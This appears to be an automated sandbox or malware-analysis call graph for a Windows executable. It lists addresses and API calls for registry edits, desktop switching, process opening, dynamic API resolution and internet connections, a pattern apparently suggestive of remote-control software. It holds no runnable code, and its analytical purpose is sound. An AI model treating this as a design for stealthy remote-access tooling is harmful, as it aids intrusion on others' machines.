LoadLibraryA 83289->83292 83296 11108fe9 83289->83296 83293 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83290->83293 83291->83288 83295 11109010 GetProcAddress 83292->83295 83292->83296 83294 11108fa6 83293->83294 83294->83228 83299 11109020 SHGetSettings 83295->83299 83300 11109034 FreeLibrary 83295->83300 83297 111090d1 CoUninitialize 83296->83297 83298 111090d7 83296->83298 83297->83298 83301 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83298->83301 83299->83300 83300->83296 83302 111090e6 83301->83302 83302->83228 83304 1110e3f0 83303->83304 83309 1110e403 83303->83309 83305 11059580 79 API calls 83304->83305 83305->83309 83306 1110e443 SystemParametersInfoA 83308 1110e44c 83306->83308 83307 1110e40f 83307->83308 83311 11134650 std::locale::facet::_Facet_Register 90 API calls 83307->83311 83310 1110e478 83308->83310 83312 11059580 79 API calls 83308->83312 83309->83306 83309->83307 83309->83308 83313 1110e484 83310->83313 83314 1110e4ab SystemParametersInfoA 83310->83314 83316 1110e4bd 83310->83316 83315 1110e41c 83311->83315 83312->83310 83313->83316 83319 1110e496 SystemParametersInfoA 83313->83319 83314->83316 83317 1110e420 GetSystemMetrics 83315->83317 83318 1110e42c 83315->83318 83320 1110e4dc 83316->83320 83324 11059580 79 API calls 83316->83324 83317->83308 83317->83318 83318->83308 83321 1110e431 SystemParametersInfoA 83318->83321 83319->83316 83322 1110e4e8 83320->83322 83323 1110e50c SystemParametersInfoA 83320->83323 83325 1110e51b 83320->83325 83321->83308 83322->83325 83326 1110e4f7 SystemParametersInfoA 83322->83326 83323->83325 83324->83320 83327 1110e53a 83325->83327 83328 11059580 79 API calls 83325->83328 83326->83325 83329 1110e546 83327->83329 83330 1110e56a SystemParametersInfoA 83327->83330 83331 1110e579 83327->83331 83328->83327 83329->83331 83333 1110e555 SystemParametersInfoA 83329->83333 83330->83331 83332 1110e598 83331->83332 83334 11059580 79 API calls 83331->83334 83335 1110e5a4 83332->83335 83336 1110e5c8 SystemParametersInfoA 83332->83336 83337 1110e5d7 83332->83337 83333->83331 83334->83332 83335->83337 83338 1110e5b3 SystemParametersInfoA 83335->83338 83336->83337 83339 1110e5f6 83337->83339 83342 11059580 79 API calls 83337->83342 83338->83337 83340 1110e602 83339->83340 83341 1110e626 SystemParametersInfoA 83339->83341 83343 1110e635 83339->83343 83340->83343 83344 1110e611 SystemParametersInfoA 83340->83344 83341->83343 83342->83339 83345 1110e654 83343->83345 83346 11059580 79 API calls 83343->83346 83344->83343 83347 1110e660 83345->83347 83348 1110e684 SystemParametersInfoA 83345->83348 83349 1110e693 83345->83349 83346->83345 83347->83349 83350 1110e66f SystemParametersInfoA 83347->83350 83348->83349 83351 1110e6b2 83349->83351 83352 11059580 79 API calls 83349->83352 83350->83349 83353 1110e6e2 SystemParametersInfoA 83351->83353 83354 1110e6be 83351->83354 83355 1110e6f1 83351->83355 83352->83351 83353->83355 83354->83355 83356 1110e6cd SystemParametersInfoA 83354->83356 83357 1110e710 83355->83357 83360 11059580 79 API calls 83355->83360 83356->83355 83358 1110e740 SystemParametersInfoA 83357->83358 83359 1110e71c 83357->83359 83361 1110e74f 83357->83361 83358->83361 83359->83361 83362 1110e72b SystemParametersInfoA 83359->83362 83360->83357 83363 1110e76e 83361->83363 83364 11059580 79 API calls 83361->83364 83362->83361 83365 1110e7a5 83363->83365 83366 1110e77a 83363->83366 83368 1110e79c 83363->83368 83364->83363 83476 11109520 83365->83476 83366->83368 83369 11109520 4 API calls 83366->83369 83370 1110e7da 83368->83370 83371 11059580 79 API calls 83368->83371 83369->83368 83372 1110e7e6 83370->83372 83373 1110e80a SystemParametersInfoA 83370->83373 83374 1110e819 83370->83374 83371->83370 83372->83374 83376 1110e7f5 SystemParametersInfoA 83372->83376 83373->83374 83375 1110e838 83374->83375 83377 11059580 79 API calls 83374->83377 83378 1110e844 83375->83378 83379 1110e865 SystemParametersInfoA 83375->83379 83380 1110e871 83375->83380 83376->83374 83377->83375 83378->83380 83381 1110e853 SystemParametersInfoA 83378->83381 83379->83380 83382 1110e890 83380->83382 83385 11059580 79 API calls 83380->83385 83381->83380 83383 1110e8c3 83382->83383 83384 1110e89c 83382->83384 83387 1110e8ba 83382->83387 83487 111095d0 83383->83487 83384->83387 83388 111095d0 4 API calls 83384->83388 83385->83382 83389 1110e8fa 83387->83389 83390 11059580 79 API calls 83387->83390 83388->83387 83391 1110e906 83389->83391 83392 1110e92d 83389->83392 83394 1110e924 83389->83394 83390->83389 83391->83394 83395 111095f0 4 API calls 83391->83395 83490 111095f0 83392->83490 83396 1110e95e 83394->83396 83397 11059580 79 API calls 83394->83397 83395->83394 83398 1110e991 83396->83398 83399 1110e96a 83396->83399 83401 1110e988 83396->83401 83397->83396 83400 111095f0 4 API calls 83398->83400 83399->83401 83402 111095f0 4 API calls 83399->83402 83400->83401 83403 1110e9c2 83401->83403 83404 11059580 79 API calls 83401->83404 83402->83401 83405 1110e9f5 83403->83405 83406 1110e9ce 83403->83406 83408 1110e9ec 83403->83408 83404->83403 83407 111095f0 4 API calls 83405->83407 83406->83408 83409 111095f0 4 API calls 83406->83409 83407->83408 83410 1110ea26 83408->83410 83411 11059580 79 API calls 83408->83411 83409->83408 83412 1110ea32 83410->83412 83413 1110ea5e 83410->83413 83415 1110ea70 83410->83415 83411->83410 83412->83415 83416 111095f0 4 API calls 83412->83416 83414 111095f0 4 API calls 83413->83414 83414->83415 83415->83230 83417 1110ea50 83416->83417 83417->83230 83419 11134650 std::locale::facet::_Facet_Register 90 API calls 83418->83419 83420 1110944b 83419->83420 83421 111094d3 83420->83421 83422 11109453 RegOpenKeyExA 83420->83422 83421->83233 83422->83421 83423 1110947c 83422->83423 83424 111094b3 RegSetValueExA RegCloseKey 83423->83424 83425 11109483 83423->83425 83424->83421 83426 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83425->83426 83427 111094a0 RegCloseKey 83426->83427 83427->83233 83436 11134460 83428->83436 83430 11108d05 83430->83260 83430->83265 83432 11108d40 83431->83432 83432->83275 83432->83276 83433->83283 83434->83280 83435->83270 83437 11134481 GetVersionExA 83436->83437 83445 111345c5 83436->83445 83438 111344a3 83437->83438 83437->83445 83440 111344b0 RegOpenKeyExA 83438->83440 83438->83445 83439 111345ce 83441 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83439->83441 83444 111344dd _memset 83440->83444 83440->83445 83442 111345db 83441->83442 83442->83430 83443 1113462d 83446 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83443->83446 83448 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83444->83448 83445->83439 83445->83443 83471 1107c5a0 86 API calls 2 library calls 83445->83471 83447 1113463d 83446->83447 83447->83430 83450 1113451f 83448->83450 83451 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83450->83451 83453 11134549 83451->83453 83452 11134615 83452->83439 83454 11151867 std::locale::facet::_Facet_Register 79 API calls 83452->83454 83455 111345b8 RegCloseKey 83453->83455 83465 11151867 83453->83465 83456 11134626 83454->83456 83455->83445 83456->83439 83456->83443 83458 1113455a 83469 11152c8a 79 API calls __isdigit_l 83458->83469 83460 11134569 83461 11134582 83460->83461 83470 11152c8a 79 API calls __isdigit_l 83460->83470 83463 11151867 std::locale::facet::_Facet_Register 79 API calls 83461->83463 83464 1113458e _strncpy 83463->83464 83464->83455 83466 11151851 83465->83466 83472 111520cb 83466->83472 83469->83460 83470->83460 83471->83452 83473 111520e4 83472->83473 83474 11151ea0 strtoxl 79 API calls 83473->83474 83475 11151862 83474->83475 83475->83458 83477 11109544 83476->83477 83478 111095bb 83477->83478 83479 11109558 83477->83479 83480 1110957d 83477->83480 83478->83368 83481 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83479->83481 83482 111095a2 RegSetValueExA 83480->83482 83485 11132450 std::locale::facet::_Facet_Register RegQueryValueExA 83480->83485 83484 1110956d RegCloseKey 83481->83484 83483 111095b4 RegCloseKey 83482->83483 83483->83478 83484->83368 83486 1110959b 83485->83486 83486->83482 83486->83483 83488 11109520 4 API calls 83487->83488 83489 111095eb 83488->83489 83489->83387 83491 11109520 4 API calls 83490->83491 83492 1110960b 83491->83492 83492->83394 83493->83168 83494->83168 83496->83169 83497->83167 83498->83171 83499->83158 83500->83171 83501->83180 83506->82872 83510 11134ad0 83507->83510 83509 1104b979 83509->82828 83511 11134af4 83510->83511 83512 11134af9 83510->83512 83530 111349d0 18 API calls std::locale::facet::_Facet_Register 83511->83530 83514 11134b62 83512->83514 83515 11134b02 83512->83515 83516 11134b6f wsprintfA 83514->83516 83517 11134c0e 83514->83517 83518 11134b39 83515->83518 83520 11134b10 83515->83520 83521 11134b92 83516->83521 83519 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83517->83519 83524 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83518->83524 83522 11134c1a 83519->83522 83526 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83520->83526 83521->83521 83523 11134b99 wvsprintfA 83521->83523 83522->83509 83529 11134bb4 OutputDebugStringA 83523->83529 83525 11134b5e 83524->83525 83525->83509 83527 11134b35 83526->83527 83527->83509 83529->83517 83530->83512 83532->82902 83533->82890 83535->82918 83536->82920 83625 110ae510 83538->83625 83540 111032de GetCurrentThreadId 83627 11102790 83540->83627 83542 111032f9 std::ios_base::_Tidy 83543 11103370 83542->83543 83545 11103310 WaitForSingleObject 83542->83545 83548 11103333 83542->83548 83633 11103100 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 83542->83633 83634 111027c0 SetEvent PulseEvent 83543->83634 83632 11103100 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 83545->83632 83546 1110337a 83549 11103343 PostMessageA 83548->83549 83550 11103348 PostThreadMessageA 83548->83550 83549->83542 83550->83542 83553 11025fd2 83552->83553 83636 11083b60 83553->83636 83556 11102870 std::locale::facet::_Facet_Register 265 API calls 83557 11025ff6 83556->83557 83558 111035c0 412 API calls 83557->83558 83559 11026017 83557->83559 83558->83559 83560 11102790 266 API calls 83559->83560 83572 1102602f 83560->83572 83561 11026046 WaitForMultipleObjects 83561->83572 83562 1102610d 83566 11026127 CloseHandle 83562->83566 83642 11103160 278 API calls 2 library calls 83562->83642 83563 11026066 PostMessageA 83564 1102607a SetEvent Sleep 83563->83564 83563->83572 83564->83572 83565 110260a1 PostMessageA 83565->83572 83643 111027c0 SetEvent PulseEvent 83566->83643 83569 1102611e std::ios_base::_Tidy 83569->83566 83570 1102613c 83571 110260d3 GetCurrentThreadId GetThreadDesktop 83571->83572 83573 110260e2 SetThreadDesktop 83571->83573 83572->83561 83572->83562 83572->83563 83572->83564 83572->83565 83572->83571 83641 11025f80 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 83572->83641 83573->83572 83575 110260ed CloseDesktop 83573->83575 83575->83572 83577 1102adf2 83576->83577 83578 11102790 266 API calls 83577->83578 83579 1102adff WaitForSingleObject 83578->83579 83580 1102ae16 83579->83580 83581 1102b02d 83579->83581 83583 1102ae20 GetTickCount 83580->83583 83584 1102b016 WaitForSingleObject 83580->83584 83736 111027c0 SetEvent PulseEvent 83581->83736 83650 110c6600 83583->83650 83584->83580 83584->83581 83586 1102b034 CloseHandle 83737 111029d0 InterlockedDecrement SetEvent PulseEvent InterlockedDecrement CloseHandle 83586->83737 83588 110c6600 268 API calls 83601 1102ae36 83588->83601 83589 1102b045 std::ios_base::_Tidy 83591 1102b064 83738 11027fb0 265 API calls 2 library calls 83591->83738 83593 1102b078 83739 11027fb0 265 API calls 2 library calls 83593->83739 83595 1102b08c 83740 11027fb0 265 API calls 2 library calls 83595->83740 83598 1102b0a0 83741 11027fb0 265 API calls 2 library calls 83598->83741 83600 1102af24 GetTickCount 83606 1102af21 std::ios_base::_Tidy 83600->83606 83601->83588 83601->83591 83601->83593 83601->83595 83601->83600 83660 110c57c0 83601->83660 83672 110c6420 269 API calls 2 library calls 83601->83672 83673 110280f0 LoadLibraryA 83601->83673 83603 111356e0 std::locale::facet::_Facet_Register 21 API calls 83603->83606 83605 110c5870 265 API calls 83605->83606 83606->83591 83606->83593 83606->83598 83606->83600 83606->83603 83606->83605 83610 11063210 300 API calls 83606->83610 83725 11131740 83606->83725 83734 110415a0 267 API calls 2 library calls 83606->83734 83735 110c5870 265 API calls 2 library calls 83606->83735 83610->83606 83612 11083b60 5 API calls 83611->83612 83613 110f633c 83612->83613 83614 110f6348 GetCurrentThreadId GetThreadDesktop OpenDesktopA 83613->83614 83615 110f636e SetThreadDesktop CloseDesktop 83614->83615 83616 110f637c 83614->83616 83615->83616 83860 110f62b0 83616->83860 83618 110f6383 83619 11102790 266 API calls 83618->83619 83620 110f638a 83619->83620 83866 110e95e0 16 API calls 83620->83866 83622 110f6391 83867 111027c0 SetEvent PulseEvent 83622->83867 83624 110f6398 std::ios_base::_Tidy 83626 110ae518 std::locale::facet::_Facet_Register 83625->83626 83626->83540 83628 111027b0 SetEvent 83627->83628 83629 11102799 83627->83629 83628->83542 83635 11027fb0 265 API calls 2 library calls 83629->83635 83632->83542 83633->83542 83634->83546 83644 11102bc0 83636->83644 83638 11083b70 83639 11025fd9 CreateEventA 83638->83639 83640 11083b82 UnhookWindowsHookEx 83638->83640 83639->83556 83640->83639 83641->83572 83642->83569 83643->83570 83645 11102bd7 EnterCriticalSection 83644->83645 83646 11102bce GetCurrentThreadId 83644->83646 83647 11102bee ___DllMainCRTStartup 83645->83647 83646->83645 83648 11102bf5 LeaveCriticalSection 83647->83648 83649 11102c08 LeaveCriticalSection 83647->83649 83648->83638 83649->83638 83742 110c6530 83650->83742 83653 110c664b 83656 110c6665 83653->83656 83657 110c6648 83653->83657 83654 110c6634 83756 11027fb0 265 API calls 2 library calls 83654->83756 83656->83601 83657->83653 83757 11027fb0 265 API calls 2 library calls 83657->83757 83661 110c57d4 83660->83661 83797 11153ff7 83661->83797 83668 110c582c 83668->83601 83669 110c5815 83822 11027fb0 265 API calls 2 library calls 83669->83822 83672->83601 83697 11028181 std::ios_base::_Tidy 83673->83697 83674 110281b3 GetProcAddress 83675 110281d1 SetLastError 83674->83675 83674->83697 83675->83697 83676 110282a8 InternetOpenA 83676->83697 83677 1102828f GetProcAddress 83677->83676 83678 110282d9 SetLastError 83677->83678 83678->83697 83679 11151665 66 API calls _free 83679->83697 83680 11028205 GetProcAddress 83681 110282c2 SetLastError 83680->83681 83680->83697 83682 11028232 GetLastError 83681->83682 83682->83697 83683 11131740 std::locale::facet::_Facet_Register 265 API calls 83683->83697 83684 11028255 GetProcAddress 83685 110282cf SetLastError 83684->83685 83684->83697 83685->83697 83686 111515d1 66 API calls _malloc 83686->83697 83687 110285a0 83692 110286d6 GetProcAddress 83687->83692 83693 11028591 83687->83693 83688 1102857a std::ios_base::_Tidy 83688->83687 83691 110285b7 GetProcAddress 83688->83691 83688->83693 83698 11028696 std::ios_base::_Tidy 83688->83698 83700 110285e8 std::ios_base::_Tidy 83688->83700 83689 11028710 83689->83606 83690 11028709 FreeLibrary 83690->83689 83691->83688 83695 1102868e SetLastError 83691->83695 83692->83693 83696 110286f7 SetLastError 83692->83696 83693->83689 83693->83690 83694 1107c3b0 IsDBCSLeadByte 83694->83697 83695->83698 83696->83693 83697->83674 83697->83676 83697->83677 83697->83679 83697->83680 83697->83682 83697->83683 83697->83684 83697->83686 83697->83688 83697->83694 83704 1102835f GetProcAddress 83697->83704 83705 1102838b GetProcAddress 83697->83705 83706 1102839e InternetConnectA 83697->83706 83711 11028403 GetProcAddress 83697->83711 83712 110283c4 GetProcAddress 83697->83712 83716 11028451 GetProcAddress 83697->83716 83718 11028482 GetLastError 83697->83718 83721 110284d5 GetLastError 83697->83721 83722 110284ec GetDesktopWindow 83697->83722 83856 110265c0 GetProcAddress SetLastError 83698->83856 83700->83688 83700->83698 83715 110c6140 268 API calls 83700->83715 83848 111028f0 83700->83848 83855 11026570 GetProcAddress SetLastError 83700->83855 83701 110286bb 83857 110265c0 GetProcAddress SetLastError 83701->83857 83704->83697 83708 1102837c SetLastError 83704->83708 83705->83706 83710 110283e1 SetLastError 83705->83710 83706->83697 83707 110286ca 83707->83687 83708->83697 83710->83697 83711->83697 83714 11028436 SetLastError 83711->83714 83712->83697 83713 110283f1 SetLastError 83712->83713 83713->83697 83714->83697 83715->83700 83716->83697 83717 11028478 SetLastError 83716->83717 83717->83718 83718->83697 83719 1102849d GetProcAddress 83718->83719 83719->83697 83720 110284cd SetLastError 83719->83720 83720->83721 83721->83697 83721->83722 83722->83697 83723 110284fa GetProcAddress 83722->83723 83723->83697 83724 11028536 SetLastError 83723->83724 83724->83697 83726 1113174a 83725->83726 83727 1113174c 83725->83727 83726->83606 83728 111028f0 std::locale::facet::_Facet_Register 265 API calls 83727->83728 83729 11131772 83728->83729 83730 1113177b _strncpy 83729->83730 83731 11131799 83729->83731 83730->83606 83859 11027fb0 265 API calls 2 library calls 83731->83859 83734->83606 83735->83584 83736->83586 83737->83589 83743 110c653c 83742->83743 83744 110c6557 83743->83744 83745 110c6540 83743->83745 83759 110c5270 83744->83759 83758 11027fb0 265 API calls 2 library calls 83745->83758 83752 110c658e 83752->83653 83752->83654 83753 110c6577 83788 11027fb0 265 API calls 2 library calls 83753->83788 83760 110c5279 83759->83760 83761 110c527d 83760->83761 83762 110c5294 83760->83762 83789 11027fb0 265 API calls 2 library calls 83761->83789 83764 110c5291 83762->83764 83765 110c52c8 83762->83765 83764->83762 83790 11027fb0 265 API calls 2 library calls 83764->83790 83767 110c52c5 83765->83767 83768 110c52e6 83765->83768 83767->83765 83791 11027fb0 265 API calls 2 library calls 83767->83791 83771 110c6140 83768->83771 83772 110c614e 83771->83772 83773 110c6169 83772->83773 83774 110c6152 83772->83774 83775 110c619c 83773->83775 83778 110c6166 83773->83778 83792 11027fb0 265 API calls 2 library calls 83774->83792 83777 110c6210 83775->83777 83794 110c5a90 265 API calls std::locale::facet::_Facet_Register 83775->83794 83777->83752 83777->83753 83778->83773 83793 11027fb0 265 API calls 2 library calls 83778->83793 83781 110c61c3 83784 110c61cf _memmove 83781->83784 83795 110c59d0 268 API calls 2 library calls 83781->83795 83784->83777 83785 110c61f9 83784->83785 83796 11027fb0 265 API calls 2 library calls 83785->83796 83794->83781 83795->83784 83798 110c57df 83797->83798 83799 11154008 _strlen 83797->83799 83805 110c5540 83798->83805 83800 111515d1 _malloc 66 API calls 83799->83800 83801 1115401b 83800->83801 83801->83798 83823 1115a87f 83801->83823 83806 110c554b 83805->83806 83807 110c5562 83805->83807 83844 11027fb0 265 API calls 2 library calls 83806->83844 83810 110c4f50 83807->83810 83811 110c4f5d 83810->83811 83812 110c4f78 83811->83812 83813 110c4f61 83811->83813 83814 110c4f75 83812->83814 83815 110c4f96 83812->83815 83845 11027fb0 265 API calls 2 library calls 83813->83845 83814->83812 83846 11027fb0 265 API calls 2 library calls 83814->83846 83818 110c4f93 83815->83818 83821 110c4fb9 83815->83821 83818->83815 83847 11027fb0 265 API calls 2 library calls 83818->83847 83821->83668 83821->83669 83824 1115a894 83823->83824 83825 1115a88d 83823->83825 83835 11157ccf 66 API calls __getptd_noexit 83824->83835 83825->83824 83828 1115a8b2 83825->83828 83827 1115a899 83836 1115c8e4 11 API calls __close 83827->83836 83830 1115402d 83828->83830 83837 11157ccf 66 API calls __getptd_noexit 83828->83837 83830->83798 83832 1115c892 83830->83832 83838 1115c769 83832->83838 83835->83827 83836->83830 83837->83827 83839 1115c788 _memset __call_reportfault 83838->83839 83840 1115c7a6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 83839->83840 83841 1115c874 __call_reportfault 83840->83841 83842 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83841->83842 83843 1115c890 GetCurrentProcess TerminateProcess 83842->83843 83843->83798 83849 111515d1 _malloc 66 API calls 83848->83849 83850 111028fe 83849->83850 83851 11102907 83850->83851 83852 1110291e _memset 83850->83852 83858 11027fb0 265 API calls 2 library calls 83851->83858 83852->83700 83855->83700 83856->83701 83857->83707 83861 11102870 std::locale::facet::_Facet_Register 265 API calls 83860->83861 83862 110f62dd 83861->83862 83863 110f6310 83862->83863 83868 110f6190 83862->83868 83863->83618 83865 110f62fd 83865->83618 83866->83622 83867->83624 83875 1114dfd0 83868->83875 83871 110f61f7 std::locale::facet::_Facet_Register 83874 110f6230 GetStockObject RegisterClassA 83871->83874 83872 110f625a std::locale::facet::_Facet_Register 83873 110f6267 CreateWindowExA 83872->83873 83873->83865 83874->83872 83878 1114ce30 GlobalAddAtomA 83875->83878 83879 1114ce65 GetLastError wsprintfA 83878->83879 83880 1114ceb7 GlobalAddAtomA GlobalAddAtomA 83878->83880 83887 11027fb0 265 API calls 2 library calls 83879->83887 83881 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83880->83881 83883 110f61c1 GlobalAddAtomA 83881->83883 83883->83871 83883->83872 83888->82950 83889 1102f520 83890 1102f52e 83889->83890 83894 11135150 83890->83894 83893 1102f54f std::locale::facet::_Facet_Register 83897 111343d0 83894->83897 83898 111343e0 83897->83898 83898->83898 83899 111028f0 std::locale::facet::_Facet_Register 265 API calls 83898->83899 83900 111343f2 83899->83900 83903 11134300 83900->83903 83902 1102f53f SetUnhandledExceptionFilter 83902->83893 83904 11134317 _strncpy 83903->83904 83905 11134352 _com_util::ConvertStringToBSTR 83903->83905 83904->83904 83906 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83904->83906 83914 11131b90 MultiByteToWideChar 83905->83914 83908 1113434e 83906->83908 83908->83902 83909 11134384 83915 11131bd0 WideCharToMultiByte GetLastError 83909->83915 83911 11134396 83912 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 83911->83912 83913 111343a9 83912->83913 83913->83902 83914->83909 83915->83911 83916 1102cd80 83917 1102cdc3 83916->83917 83918 11102870 std::locale::facet::_Facet_Register 265 API calls 83917->83918 83919 1102cdca 83918->83919 83921 1102cdea 83919->83921 84962 11131ea0 83919->84962 84290 11132000 83921->84290 83924 1102ce41 83927 11132000 86 API calls 83924->83927 83926 1102ce26 83929 1107c4f0 86 API calls 83926->83929 83928 1102ce6a 83927->83928 83930 11151867 std::locale::facet::_Facet_Register 79 API calls 83928->83930 83934 1102ce77 83928->83934 83929->83924 83930->83934 83931 1102cea6 83932 1102cf25 CreateEventA 83931->83932 83933 1102ceff GetSystemMetrics 83931->83933 83940 1102cf45 83932->83940 83941 1102cf59 83932->83941 83933->83932 83935 1102cf0e 83933->83935 83934->83931 83938 11134460 std::locale::facet::_Facet_Register 90 API calls 83934->83938 83936 111356e0 std::locale::facet::_Facet_Register 21 API calls 83935->83936 83939 1102cf18 83936->83939 83938->83931 84980 1102bb50 1295 API calls 4 library calls 83939->84980 84981 11027fb0 265 API calls 2 library calls 83940->84981 83944 11102870 std::locale::facet::_Facet_Register 265 API calls 83941->83944 83945 1102cf60 83944->83945 83946 1102cf80 83945->83946 83947 111035c0 423 API calls 83945->83947 83948 11102870 std::locale::facet::_Facet_Register 265 API calls 83946->83948 83947->83946 83949 1102cf94 83948->83949 83950 111035c0 423 API calls 83949->83950 83951 1102cfb4 83949->83951 83950->83951 83952 11102870 std::locale::facet::_Facet_Register 265 API calls 83951->83952 83953 1102d033 83952->83953 83954 1102d063 83953->83954 84982 1105c840 83953->84982 83956 11102870 std::locale::facet::_Facet_Register 265 API calls 83954->83956 83957 1102d07d 83956->83957 83958 1102d0a2 FindWindowA 83957->83958 85001 1105c4b0 83957->85001 83961 1102d1f7 83958->83961 83962 1102d0db 83958->83962 84296 1105cc90 83961->84296 83962->83961 83966 1102d0f3 GetWindowThreadProcessId 83962->83966 83965 1105cc90 268 API calls 83967 1102d215 83965->83967 83968 111356e0 std::locale::facet::_Facet_Register 21 API calls 83966->83968 83970 1105cc90 268 API calls 83967->83970 83969 1102d119 OpenProcess 83968->83969 83969->83961 83971 1102d139 83969->83971 83972 1102d221 83970->83972 85014 1108dac0 105 API calls 83971->85014 83974 1102d238 83972->83974 83975 1102d22f 83972->83975 84303 11134c40 83974->84303 85015 11026a90 119 API calls 2 library calls 83975->85015 83976 1102d158 83978 111356e0 std::locale::facet::_Facet_Register 21 API calls 83976->83978 83981 1102d16c 83978->83981 83979 1102d234 83979->83974 83983 1102d1ab CloseHandle FindWindowA 83981->83983 83985 111356e0 std::locale::facet::_Facet_Register 21 API calls 83981->83985 83982 1102d247 84318 11134180 ExpandEnvironmentStringsA 83982->84318 83986 1102d1d3 GetWindowThreadProcessId 83983->83986 83987 1102d1e7 83983->83987 83989 1102d17e SendMessageA WaitForSingleObject 83985->83989 83986->83987 83990 111356e0 std::locale::facet::_Facet_Register 21 API calls 83987->83990 83989->83983 83993 1102d19e 83989->83993 83991 1102d1f4 83990->83991 83991->83961 83995 111356e0 std::locale::facet::_Facet_Register 21 API calls 83993->83995 83997 1102d1a8 83995->83997 83997->83983 85076 11131f10 84290->85076 84292 11132015 84293 1102ce14 84292->84293 84294 11131f10 IsDBCSLeadByte 84292->84294 84295 11154186 85 API calls std::locale::facet::_Facet_Register 84292->84295 84293->83924 84970 1107c4f0 84293->84970 84294->84292 84295->84292 84297 1105ccb7 84296->84297 84298 1105cd06 84296->84298 84297->84298 84300 1107c4f0 86 API calls 84297->84300 85088 1105cbb0 268 API calls 4 library calls 84297->85088 84299 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 84298->84299 84302 1102d209 84299->84302 84300->84297 84302->83965 85089 11133f90 84303->85089 84306 11133f90 std::locale::facet::_Facet_Register 265 API calls 84307 11134c77 wsprintfA 84306->84307 84308 11132680 std::locale::facet::_Facet_Register 8 API calls 84307->84308 84309 11134c94 84308->84309 84310 11134cc0 84309->84310 84311 11132680 std::locale::facet::_Facet_Register 8 API calls 84309->84311 84312 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 84310->84312 84313 11134ca9 84311->84313 84314 11134ccc 84312->84314 84313->84310 84315 11134cb0 84313->84315 84314->83982 84316 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 84315->84316 84317 11134cbc 84316->84317 84317->83982 84319 111341b7 84318->84319 84320 111341c4 84319->84320 84321 111341ee 84319->84321 84323 111341d4 std::locale::facet::_Facet_Register 84319->84323 84325 11131740 std::locale::facet::_Facet_Register 265 API calls 84320->84325 84322 11133f90 std::locale::facet::_Facet_Register 265 API calls 84321->84322 84324 111341f4 84322->84324 84326 111341e5 GetModuleFileNameA 84323->84326 84328 1107c480 std::locale::facet::_Facet_Register IsDBCSLeadByte 84324->84328 84327 11134248 84325->84327 84326->84324 84329 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 84327->84329 84328->84320 84330 1102d258 84329->84330 84331 11132680 84330->84331 84332 111326a1 CreateFileA 84331->84332 84334 1113273e CloseHandle 84332->84334 84335 1113271e 84332->84335 84338 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 84334->84338 84336 11132722 CreateFileA 84335->84336 84337 1113275b 84335->84337 84336->84334 84336->84337 84340 11150781 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 84337->84340 84339 11132757 84338->84339 84963 11131ee8 84962->84963 84966 11131eae 84962->84966 84964 11131740 std::locale::facet::_Facet_Register 265 API calls 84963->84964 84965 11131ef0 84964->84965 84965->83921 84966->84963 84967 11131ed2 84966->84967 87242 111317c0 267 API calls std::locale::facet::_Facet_Register 84967->87242 84969 11131ed8 84969->83921 84971 1107c502 84970->84971 84972 1107c4fd 84970->84972 84974 1107c50b 84971->84974 84977 1107c51f 84971->84977 87243 1107c2d0 IsDBCSLeadByte 84972->87243 87244 11152f3c 85 API calls 2 library calls 84974->87244 84976 1107c518 84976->83926 84978 1107c583 84977->84978 84979 11154186 85 API calls std::locale::facet::_Facet_Register 84977->84979 84978->83926 84979->84977 84983 1105c4b0 293 API calls 84982->84983 84984 1105c87e 84983->84984 84985 11102870 std::locale::facet::_Facet_Register 265 API calls 84984->84985 84986 1105c8ab 84985->84986 84987 1105c8c4 84986->84987 84988 1105c4b0 293 API calls 84986->84988 84989 11102870 std::locale::facet::_Facet_Register 265 API calls 84987->84989 84988->84987 84990 1105c8d5 84989->84990 84991 1105c4b0 293 API calls 84990->84991 84993 1105c8ee 84990->84993 84991->84993 84992 1105c942 84992->83954 84993->84992 84994 11131740 std::locale::facet::_Facet_Register 265 API calls 84993->84994 84995 1105c916 84994->84995 84996 1105c810 274 API calls 84995->84996 84997 1105c926 84996->84997 84998 1105c810 274 API calls 84997->84998 84999 1105c934 84998->84999 85000 1105c810 274 API calls 84999->85000 85000->84992 85002 11102870 std::locale::facet::_Facet_Register 265 API calls 85001->85002 85003 